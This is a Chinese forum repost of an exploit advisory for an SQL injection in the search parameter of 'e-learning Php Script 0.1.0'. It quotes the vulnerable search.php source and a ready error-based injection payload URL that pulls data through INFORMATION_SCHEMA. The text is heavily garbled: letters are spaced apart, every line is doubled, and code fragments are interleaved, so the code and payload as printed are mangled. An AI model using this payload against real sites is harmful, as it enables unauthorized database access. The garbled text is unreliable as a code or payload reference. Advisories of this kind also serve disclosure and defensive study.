[28385] 2020-07-01_电子学习PHP脚本0.1.0-'search'SQL注入

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-19
2020-07-01_电子学习PHP脚本0.1.0-'search'SQL注入 P H P 0 . 1 . 0 -   ' s e a r c h '   S Q L O t s   2 0 2 0 - 0 7 - 0 1 #   E x p l o i t   T i t l e :   e - l e a r n i n g   P h p   S c r i p t   0 . 1 . 0   -   ' s e a r c h '   S Q L   I n j e c t i o n #   E x p l o i t   T i t l e :   e - l e a r n i n g   P h p   S c r i p t   0 . 1 . 0   -   ' s e a r c h '   S Q L   I n j e c t i o n #   D a t e :   2 0 2 0 - 0 6 - 2 9 #   D a t e :   2 0 2 0 - 0 6 - 2 9 #   E x p l o i t   A u t h o r :   K e o p s s G r o u p 0 d a y , I n c #   E x p l o i t   A u t h o r :   K e o p s s G r o u p 0 d a y , I n c #   V e n d o r   H o m e p a g e :   h t t p s : / / g i t h u b . c o m / a m i t k o l l o l d e y / e l e a r n i n g - s c r i p t #   V e n d o r   H o m e p a g e :   h t t p s : / / g i t h u b . c o m / a m i t k o l l o l d e y / e l e a r n i n g - s c r i p t #   S o f t w a r e   L i n k :   h t t p s : / / g i t h u b . c o m / a m i t k o l l o l d e y / e l e a r n i n g - s c r i p t #   S o f t w a r e   L i n k :   h t t p s : / / g i t h u b . c o m / a m i t k o l l o l d e y / e l e a r n i n g - s c r i p t #   V e r s i o n :   0 . 1 . 0 #   V e r s i o n :   0 . 1 . 0 #   T e s t e d   o n :   K a l i   L i n u x #   T e s t e d   o n :   K a l i   L i n u x S o u r c e   c o d e ( s e a r c h . p h p ) : S o u r c e   c o d e ( s e a r c h . p h p ) :                                           < ? p h p                                           < ? p h p                                           i f ( i s s e t ( $ _ G E T [ ' s e a r c h _ s u b m i t ' ] ) ) {                                           i f ( i s s e t ( $ _ G E T [ ' s e a r c h _ s u b m i t ' ] ) ) {                                           $ s e a r c h _ k e y   =   $ _ G E T [ ' s e a r c h ' ] ;                                           $ s e a r c h _ k e y   =   $ _ G E T [ ' s e a r c h ' ] ;                                           $ s e a r c h   =   " s e l e c t   *   f r o m   p o s t s   w h e r e   p o s t _ k e y w o r d s                                           $ s e a r c h   =   " s e l e c t   *   f r o m   p o s t s   w h e r e   p o s t _ k e y w o r d s l i k e   ' % $ s e a r c h _ k e y % ' " ; l i k e   ' % $ s e a r c h _ k e y % ' " ;                                           $ r u n _ s e a r c h   =   m y s q l i _ q u e r y ( $ c o n , $ s e a r c h ) ;                                           $ r u n _ s e a r c h   =   m y s q l i _ q u e r y ( $ c o n , $ s e a r c h ) ;                                           $ c o u n t   =   m y s q l i _ n u m _ r o w s ( $ r u n _ s e a r c h ) ;                                           $ c o u n t   =   m y s q l i _ n u m _ r o w s ( $ r u n _ s e a r c h ) ;                                           i f ( $ c o u n t   = =   0 ) {                                           i f ( $ c o u n t   = =   0 ) {                                           e c h o   " < h 2 > N o   R e s u l t   F o u n d . P l e a s e   T r y   W i t h   A n o t h e r                                           e c h o   " < h 2 > N o   R e s u l t   F o u n d . P l e a s e   T r y   W i t h   A n o t h e r K e y w o r d s . < / h 2 > " ; K e y w o r d s . < / h 2 > " ;                                           } e l s e {                                           } e l s e {                                           w h i l e ( $ s e a r c h _ r o w   =                                           w h i l e ( $ s e a r c h _ r o w   = m y s q l i _ f e t c h _ a r r a y ( $ r u n _ s e a r c h ) ) : m y s q l i _ f e t c h _ a r r a y ( $ r u n _ s e a r c h ) ) :                                           $ p o s t _ i d   =   $ s e a r c h _ r o w   [ ' p o s t _ i d ' ] ;                                           $ p o s t _ i d   =   $ s e a r c h _ r o w   [ ' p o s t _ i d ' ] ;                                           $ p o s t _ t i t l e   =   $ s e a r c h _ r o w   [ ' p o s t _ t i t l e ' ] ;                                           $ p o s t _ t i t l e   =   $ s e a r c h _ r o w   [ ' p o s t _ t i t l e ' ] ;                                           $ p o s t _ d a t e   =   $ s e a r c h _ r o w   [ ' p o s t _ d a t e ' ] ;                                           $ p o s t _ d a t e   =   $ s e a r c h _ r o w   [ ' p o s t _ d a t e ' ] ;                                           $ p o s t _ a u t h o r   =   $ s e a r c h _ r o w   [ ' p o s t _ a u t h o r ' ] ;                                           $ p o s t _ a u t h o r   =   $ s e a r c h _ r o w   [ ' p o s t _ a u t h o r ' ] ;                                           $ p o s t _ f e a t u r e d _ i m a g e   =   $ s e a r c h _ r o w   [ ' p o s t _ i m a g e ' ] ;                                           $ p o s t _ f e a t u r e d _ i m a g e   =   $ s e a r c h _ r o w   [ ' p o s t _ i m a g e ' ] ;                                           $ p o s t _ k e y w o r d s   =   $ s e a r c h _ r o w   [ ' p o s t _ k e y w o r d s ' ] ;                                           $ p o s t _ k e y w o r d s   =   $ s e a r c h _ r o w   [ ' p o s t _ k e y w o r d s ' ] ;                                           $ p o s t _ c o n t e n t   =   s u b s t r ( $ s e a r c h _ r o w                                           $ p o s t _ c o n t e n t   =   s u b s t r ( $ s e a r c h _ r o w [ ' p o s t _ c o n t e n t ' ] , 0 , 2 0 0 ) ; [ ' p o s t _ c o n t e n t ' ] , 0 , 2 0 0 ) ;                                           ? >                                           ? > P a y l o a d : P a y l o a d :                   h t t p : / / 1 2 7 . 0 . 0 . 1 / e / s e a r c h . p h p ? s e a r c h = a & s e a r c h _ s u b m i t = S e a r c h                   h t t p : / / 1 2 7 . 0 . 0 . 1 / e / s e a r c h . p h p ? s e a r c h = a & s e a r c h _ s u b m i t = S e a r c h                   h t t p : / / 1 2 7 . 0 . 0 . 1 / e / s e a r c h . p h p ? s e a r c h = a ' O R   ( S E L E C T   3 4 7 5                   h t t p : / / 1 2 7 . 0 . 0 . 1 / e / s e a r c h . p h p ? s e a r c h = a ' O R   ( S E L E C T   3 4 7 5 F R O M ( S E L E C T   C O U N T ( * ) , C O N C A T ( 0 x 7 1 6 b 7 8 7 1 7 1 , ( S E L E C T F R O M ( S E L E C T   C O U N T ( * ) , C O N C A T ( 0 x 7 1 6 b 7 8 7 1 7 1 , ( S E L E C T ( E L T ( 3 4 7 5 = 3 4 7 5 , 1 ) ) ) , 0 x 7 1 7 1 7 8 7 8 7 1 , F L O O R ( R A N D ( 0 ) * 2 ) ) x   F R O M ( E L T ( 3 4 7 5 = 3 4 7 5 , 1 ) ) ) , 0 x 7 1 7 1 7 8 7 8 7 1 , F L O O R ( R A N D ( 0 ) * 2 ) ) x   F R O M I N F O R M A T I O N _ S C H E M A . P L U G I N S   G R O U P   B Y   x ) a ) - -   I s D G & s e a r c h _ s u b m i t = S e a r c h I N F O R M A T I O N _ S C H E M A . P L U G I N S   G R O U P   B Y   x ) a ) - -   I s D G & s e a r c h _ s u b m i t = S e a r c h

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则